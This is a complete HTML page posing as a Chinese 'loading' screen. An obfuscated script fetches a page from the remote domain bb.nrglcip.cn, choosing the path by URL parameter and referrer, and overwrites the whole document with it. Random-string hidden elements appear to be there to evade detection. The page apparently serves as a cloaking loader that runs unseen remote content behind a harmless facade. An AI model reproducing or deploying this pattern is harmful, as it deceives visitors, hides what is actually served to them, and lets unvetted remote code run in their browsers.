<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .OrDComAQreB {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .OrDComAQreB .QWiOw8v {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .OrDComAQreB .content {
            line-height: 50px;
            text-align: center
        }

        .OrDComAQreB .img {
            width: 100%
        }

        .OrDComAQreB .WWDTXrM {
            text-align: center
        }

        .OrDComAQreB .WWDTXrM span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .OrDComAQreB .WWDTXrM span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .OrDComAQreB .WWDTXrM span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .OrDComAQreB .WWDTXrM span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .OrDComAQreB .WWDTXrM span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .OrDComAQreB .WWDTXrM span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .OrDComAQreB .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function KLRXtTvoV(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var AZBWt = KLRXtTvoV('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ AZBWt +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ AZBWt +".html?a=share";
		}
		
        sby1M6nqM=url+"#"+new Date().getTime();
        sby1M6nqM && function() {
            $.get(sby1M6nqM, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >WLXGfrfDXNRPH0A</ul>
<ul style='display:none' >WLXGfrfDXNRPH0A</ul>
<h1 style='display:none' >hui7BIaRxBBaGB2hfNQ9xX0uW0BZz2rHsLrz0mkpTmfnvzroblJ1OkcIQ12P89XN1zlehW5vXwgYZAGhaz7qgwc6F0DlmqELCXp</h1>
<ul style='display:none' >WLXGfrfDXNRPH0A</ul>
<span style='display:none'>whydCVMLtsj5sMcSI8CGK</span>
<b style='display:none' >a92QjIqwJRIaVlbLJRXUVYMyHT2NZxhmw2xnSVgl6qxd87NWDbEsA1TpFnEDJC9p9leCkUUtCfKYFLVIEV1sIK792yczG</b>
<li style='display:none' >wRD4KXXJu1YzaUqsUDXLHUEfW0J8sWck8U86CQRRilCZWH4LAdcg5y6aQXzfnY0fSlKq7gA8sPvrgNMEBrDtTI</li>
<p  style='display:none'>oHGff5i8JErZ8MWTcQ9mm0YPRBoulxE5AVcFbuQSsrMg4JJHdYK2BeaP1qGHLGRHotDxeeaNbnmK7jBKCMBThkd</p>
<span style='display:none'>whydCVMLtsj5sMcSI8CGK</span><div class="OrDComAQreB">
    <div class="QWiOw8v">
        <div class="WWDTXrM">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >S9XJREMHcQwWl0NLrmIfF8CCeWCF99tgWvdmniGgCda7uN</li>
<b style='display:none' >ttaljm8NDzYtCMiSuSTh9DShGL</b>
<li style='display:none' >S9XJREMHcQwWl0NLrmIfF8CCeWCF99tgWvdmniGgCda7uN</li>
<p  style='display:none'>lZInjPwOVgEygaBfw5D4LXubO2pdeQxneUc8pQZFo99gLIqVQjDjKlTeuPHwnxkNbwAmn5403OtKLSQ4T</p>
<img  src='' style='display:none'>
<div style='display:none'>AiGOYHwX2gOf0phDBInGs3XlB2Q6xkP6ZhA6RD9K2Qb0qPEjfIN79konboUC0iiRxFENvBccxQ</div>
<p  style='display:none'>lZInjPwOVgEygaBfw5D4LXubO2pdeQxneUc8pQZFo99gLIqVQjDjKlTeuPHwnxkNbwAmn5403OtKLSQ4T</p>
<p  style='display:none'>lZInjPwOVgEygaBfw5D4LXubO2pdeQxneUc8pQZFo99gLIqVQjDjKlTeuPHwnxkNbwAmn5403OtKLSQ4T</p>
<div style='display:none'>AiGOYHwX2gOf0phDBInGs3XlB2Q6xkP6ZhA6RD9K2Qb0qPEjfIN79konboUC0iiRxFENvBccxQ</div>
<h1 style='display:none' >z9KrCh3GTBtx3yryDnMe5KqxjXwPN56yO8FNhkygFIqz41hd2TE6z9tdoJmjuPfsTiZJ1TSwfkZYfRw672tdVxMUjn5F</h1></body>
</html>